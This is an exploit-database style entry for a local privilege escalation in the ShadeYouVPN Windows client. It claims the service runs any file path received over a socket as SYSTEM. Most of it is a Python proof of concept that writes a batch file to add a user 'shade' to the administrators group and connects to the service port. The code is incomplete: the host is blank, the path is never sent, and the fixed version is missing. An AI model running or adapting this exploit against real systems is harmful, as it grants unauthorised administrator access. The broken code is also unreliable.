ShadeYouVPN Client - Privilege Escalation

Ruben Garrote Garca 14.02.2017 Verified Wait
Local Exploits Windows

Exploit Code

# Exploit Client v2.0.1.11 for Windows Privilege Escalation
# Date: 14.02.2017
# Software Link:
# Exploit Author: Kacper Szurek
# Contact:
# Website:
# Category: local
1. Description
`ShadeYou` service executes any file path send through socket without verification as SYSTEM user.

2. Proof of Concept

import socket
import tempfile

print " Client v2.0.1.11 for Windows Privilege Escalation"
print "by Kacper Szurek"
print ""
print ""

t = tempfile.TemporaryFile(delete=False, suffix='.bat')
t.write("net user shade /add\n")
t.write("net localgroup administrators shade /add")

s = socket.socket()
s.connect(("", 10295))

print s.recv(1024)
print s.recv(1024)

3. Solution
Update to version